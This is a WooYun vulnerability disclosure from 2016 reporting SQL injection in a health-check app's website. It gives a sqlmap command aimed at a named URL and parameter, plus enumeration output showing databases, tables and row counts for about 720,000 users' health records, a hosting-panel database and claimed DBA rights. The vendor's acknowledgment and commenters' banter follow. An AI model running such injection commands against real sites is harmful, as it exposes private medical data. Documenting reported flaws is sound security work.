当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0206262

漏洞标题:体检宝某处SQL注入涉及72w用户信息+跨库查询dba

相关厂商:xueyazhushou.com

漏洞作者: 黑色键盘丶

提交时间:2016-05-08 09:46

修复时间:2016-06-23 10:20

公开时间:2016-06-23 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开

简要描述:

RT 厂商大哥 app加waf pc没加哦

详细说明:

注入点:
sqlmap.py -u "http://www.xueyazhushou.com/info/infocontent.php?info_id
=1" -D tijianshi --count --tables


数据库信息

available databases [5]:
[*] amh
[*] information_schema
[*] mysql
[*] performance_schema
[*] tijianshi


当前库表信息

Database: tijianshi
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| loveand_emo               | 5008927 |
| loveand_bloodPressure     | 4741975 |
| loveand_heartRate         | 4306167 |
| loveand_oxygen            | 3947519 |
| loveand_kkk               | 3768803 |
| loveand_wave              | 2539251 |
| loveand_emoCoin           | 1377344 |
| loveand_coin              | 1332896 |
| loveand_lungsBreath       | 725240  |
| loveand_users             | 724432  |
| loveand_stepCounter       | 627474  |
| loveand_device            | 560664  |
| loveand_bloodPressureCoin | 552874  |
| loveand_heartRateCoin     | 534761  |
| loveand_oxygenCoin        | 495911  |
| loveand_kkkCoin           | 474414  |
| loveand_waveCoin          | 474335  |
| loveand_breathRate        | 464993  |
| loveand_push              | 460668  |
| loveand_visionValue       | 390168  |
| loveand_listen            | 308340  |
| loveand_visionSemang      | 278497  |
| loveand_weight            | 254260  |
| loveand_stature           | 253355  |
| loveand_user_fix_hand     | 151242  |
| loveand_xinliYiyu         | 148954  |
| loveand_visonSeruo        | 146770  |
| loveand_bmi               | 131925  |
| loveand_visionSemangCoin  | 107117  |
| loveand_lungsBreathCoin   | 77208   |
| loveand_visionTrain4      | 63898   |
| loveand_msg               | 63851   |
| loveand_visionTrain2      | 56345   |
| loveand_visionTrain7      | 56038   |
| loveand_bloodPressTrain2  | 51639   |
| loveand_visionTrain3      | 50462   |
| loveand_visionTrain5      | 49252   |
| loveand_xinliKangya       | 48788   |
| loveand_visionTrain1      | 47949   |
| loveand_visionValueCoin   | 46934   |
| loveand_xinliZibi         | 45150   |
| loveand_coinGain          | 42592   |
| loveand_visionCoin4       | 42334   |
| loveand_visionTrain9      | 39516   |
| loveand_visionTrain6      | 36845   |
| loveand_visionCoin5       | 32972   |
| loveand_listenCoin        | 32397   |
| loveand_visionCoin7       | 32212   |
| loveand_visionTrain8      | 32121   |
| loveand_visionCoin1       | 31517   |
| loveand_temperature       | 31273   |
| loveand_visionCoin2       | 31125   |
| loveand_visonSeruoCoin    | 31020   |
| loveand_comment           | 29835   |
| loveand_visionCoin3       | 27625   |
| loveand_weightTrain1      | 23881   |
| loveand_news              | 23798   |
| loveand_xinliYiyuCoin     | 21680   |
| loveand_visionCoin6       | 21120   |
| loveand_visionCoin9       | 20779   |
| loveand_visionCoin8       | 20163   |
| loveand_user_bind         | 19574   |
| loveand_bloodPressTrain1  | 19063   |
| loveand_info_comment      | 17747   |
| loveand_weightCoin1       | 17726   |
| loveand_user_notice       | 15112   |
| loveand_listenTrain1      | 12164   |
| loveand_xinliKangyaCoin   | 10889   |
| loveand_bloodPressCoin1   | 8643    |
| loveand_coin_store        | 8331    |
| loveand_listenTrain2      | 7817    |
| loveand_xinliZibiCoin     | 7731    |
| loveand_listenCoin1       | 7161    |
| loveand_listenTrain4      | 6349    |
| loveand_listenTrain3      | 6190    |
| loveand_listenTrain5      | 5942    |
| loveand_listenCoin2       | 5353    |
| loveand_listenCoin4       | 4501    |
| loveand_listenCoin3       | 4493    |
| loveand_listenCoin5       | 4311    |
| loveand_feedback          | 3133    |
| loveand_user_fix          | 2885    |
| loveand_user_msg          | 2832    |
| loveand_weightTrain2      | 1393    |
| loveand_user_friends      | 1365    |
| loveand_info              | 1299    |
| loveand_weightCoin2       | 1184    |
| loveand_blacklist         | 193     |
| loveand_user_fix_cal      | 157     |
| loveand_user_family       | 51      |
| loveand_infoclass         | 15      |
| loveand_newsclass         | 7       |
| loveand_banner            | 4       |
| loveand_admin             | 2       |
| loveand_push_sys          | 1       |
| loveand_weixin            | 1       |
+---------------------------+---------+


垮裤查询

Database: amh
+------------+---------+
| Table      | Entries |
+------------+---------+
| amh_config | 9       |
| amh_login  | 9       |
| amh_log    | 8       |
| amh_ftp    | 1       |
| amh_host   | 1       |
| amh_user   | 1       |
+------------+---------+


dba权限

1.png

漏洞证明:

注入点:
sqlmap.py -u "http://www.xueyazhushou.com/info/infocontent.php?info_id
=1" -D tijianshi --count --tables


数据库信息

available databases [5]:
[*] amh
[*] information_schema
[*] mysql
[*] performance_schema
[*] tijianshi


当前库表信息

Database: tijianshi
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| loveand_emo               | 5008927 |
| loveand_bloodPressure     | 4741975 |
| loveand_heartRate         | 4306167 |
| loveand_oxygen            | 3947519 |
| loveand_kkk               | 3768803 |
| loveand_wave              | 2539251 |
| loveand_emoCoin           | 1377344 |
| loveand_coin              | 1332896 |
| loveand_lungsBreath       | 725240  |
| loveand_users             | 724432  |
| loveand_stepCounter       | 627474  |
| loveand_device            | 560664  |
| loveand_bloodPressureCoin | 552874  |
| loveand_heartRateCoin     | 534761  |
| loveand_oxygenCoin        | 495911  |
| loveand_kkkCoin           | 474414  |
| loveand_waveCoin          | 474335  |
| loveand_breathRate        | 464993  |
| loveand_push              | 460668  |
| loveand_visionValue       | 390168  |
| loveand_listen            | 308340  |
| loveand_visionSemang      | 278497  |
| loveand_weight            | 254260  |
| loveand_stature           | 253355  |
| loveand_user_fix_hand     | 151242  |
| loveand_xinliYiyu         | 148954  |
| loveand_visonSeruo        | 146770  |
| loveand_bmi               | 131925  |
| loveand_visionSemangCoin  | 107117  |
| loveand_lungsBreathCoin   | 77208   |
| loveand_visionTrain4      | 63898   |
| loveand_msg               | 63851   |
| loveand_visionTrain2      | 56345   |
| loveand_visionTrain7      | 56038   |
| loveand_bloodPressTrain2  | 51639   |
| loveand_visionTrain3      | 50462   |
| loveand_visionTrain5      | 49252   |
| loveand_xinliKangya       | 48788   |
| loveand_visionTrain1      | 47949   |
| loveand_visionValueCoin   | 46934   |
| loveand_xinliZibi         | 45150   |
| loveand_coinGain          | 42592   |
| loveand_visionCoin4       | 42334   |
| loveand_visionTrain9      | 39516   |
| loveand_visionTrain6      | 36845   |
| loveand_visionCoin5       | 32972   |
| loveand_listenCoin        | 32397   |
| loveand_visionCoin7       | 32212   |
| loveand_visionTrain8      | 32121   |
| loveand_visionCoin1       | 31517   |
| loveand_temperature       | 31273   |
| loveand_visionCoin2       | 31125   |
| loveand_visonSeruoCoin    | 31020   |
| loveand_comment           | 29835   |
| loveand_visionCoin3       | 27625   |
| loveand_weightTrain1      | 23881   |
| loveand_news              | 23798   |
| loveand_xinliYiyuCoin     | 21680   |
| loveand_visionCoin6       | 21120   |
| loveand_visionCoin9       | 20779   |
| loveand_visionCoin8       | 20163   |
| loveand_user_bind         | 19574   |
| loveand_bloodPressTrain1  | 19063   |
| loveand_info_comment      | 17747   |
| loveand_weightCoin1       | 17726   |
| loveand_user_notice       | 15112   |
| loveand_listenTrain1      | 12164   |
| loveand_xinliKangyaCoin   | 10889   |
| loveand_bloodPressCoin1   | 8643    |
| loveand_coin_store        | 8331    |
| loveand_listenTrain2      | 7817    |
| loveand_xinliZibiCoin     | 7731    |
| loveand_listenCoin1       | 7161    |
| loveand_listenTrain4      | 6349    |
| loveand_listenTrain3      | 6190    |
| loveand_listenTrain5      | 5942    |
| loveand_listenCoin2       | 5353    |
| loveand_listenCoin4       | 4501    |
| loveand_listenCoin3       | 4493    |
| loveand_listenCoin5       | 4311    |
| loveand_feedback          | 3133    |
| loveand_user_fix          | 2885    |
| loveand_user_msg          | 2832    |
| loveand_weightTrain2      | 1393    |
| loveand_user_friends      | 1365    |
| loveand_info              | 1299    |
| loveand_weightCoin2       | 1184    |
| loveand_blacklist         | 193     |
| loveand_user_fix_cal      | 157     |
| loveand_user_family       | 51      |
| loveand_infoclass         | 15      |
| loveand_newsclass         | 7       |
| loveand_banner            | 4       |
| loveand_admin             | 2       |
| loveand_push_sys          | 1       |
| loveand_weixin            | 1       |
+---------------------------+---------+


垮裤查询

Database: amh
+------------+---------+
| Table      | Entries |
+------------+---------+
| amh_config | 9       |
| amh_login  | 9       |
| amh_log    | 8       |
| amh_ftp    | 1       |
| amh_host   | 1       |
| amh_user   | 1       |
+------------+---------+


dba权限

1.png

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-09 10:19

厂商回复:

自学php3个月,被打脸系列2

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-08 13:34 | iCare Lab(乌云厂商)

    十分感谢,已经修复了。

  2. 2016-05-09 10:25 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问,还有谁!!!!!!!!!!!!!...)

    @iCare Lab 他们都20分,我5分,我才是被打脸的阿,哥!!

  3. 2016-05-09 10:40 | iCare Lab(乌云厂商)

    @小龙 对不起啊,那是我第一次上乌云网,什么都没看懂。可以改吗?

  4. 2016-05-09 10:45 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)

    @iCare Lab 你还是送礼物吧 少年郎

  5. 2016-05-09 10:57 | 黑色键盘丶 ( 普通白帽子 | Rank:2288 漏洞数:493 | 哥,是孤独风中的一匹狼)

    @iCare Lab 没事 我小龙大表哥这个叫什么防不胜防没有事

  6. 2016-05-09 10:59 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问,还有谁!!!!!!!!!!!!!...)

    @iCare Lab改不了了阿,你加我微信wooyun_xiaolong 唠唠嗑吧,亲爱的!

  7. 2016-05-09 10:59 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问,还有谁!!!!!!!!!!!!!...)

    @iCare Lab 改不了了阿,你加我微信wooyun_xiaolong 唠唠嗑吧,亲爱的!

  8. 2016-05-09 11:02 | iCare Lab(乌云厂商)

    @小龙 已经申请了

  9. 2016-05-09 11:02 | iCare Lab(乌云厂商)

    @玄道 送礼物要稍等等,厂商目前生活很困难